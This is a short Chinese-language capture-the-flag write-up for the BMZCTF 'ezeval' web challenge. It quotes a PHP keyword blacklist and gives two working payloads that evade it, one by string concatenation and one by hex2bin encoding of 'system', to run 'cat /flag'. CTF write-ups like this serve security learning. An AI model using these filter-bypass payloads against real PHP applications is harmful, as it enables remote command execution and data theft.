BMZCTF WEB_ezeval

Posted 2021-06-10 MuRKuo

BMZCTF WEB_ezeval

思路：

绕过str_ireplace，str_ireplace过滤的blacklist

代码审计

$black_list=array(\'php\',\'echo\',\'`\',\'preg\',\'server\',\'chr\',\'decode\',\'html\',\'md5\',\'post\',\'get\',\'file\',\'session\',\'ascii\',\'eval\',\'replace\',\'assert\',\'exec\',\'cookie\',\'$\',\'include\',\'var\',\'print\',\'scan\',\'decode\',\'system\',\'func\',\'ini_\',\'passthru\',\'pcntl\',\'open\',\'link\',\'log\',\'current\',\'local\',\'source\',\'require\',\'contents\');  
```

参数过滤：

`$cmd = str_ireplace($black_list,"BMZCTF",$cmd);`

str_ireplace作用是将cmd传入的参数中含有black_list数组内的关键字用BMZCTF替换

## 绕过

payload1:

`(s.y.s.t.e.m)(\'cat /flag\');`//.在php中有连接字符串的作用，所以用来拼接字符串，命令执行中间不要加空格，注意末尾的;

payload2
`cmd=hex2bin(\'73797374656d\')(\'cat /flag\');`//编码绕过，通过ASCII加密传输


## NOTE

**htmlspecialchars() 函数：**htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。

**str_ireplace() 函数：**str_ireplace() 函数替换字符串中的一些字符（不区分大小写）

**hex2bin() 函数:**把十六进制值转换为 ASCII 字符.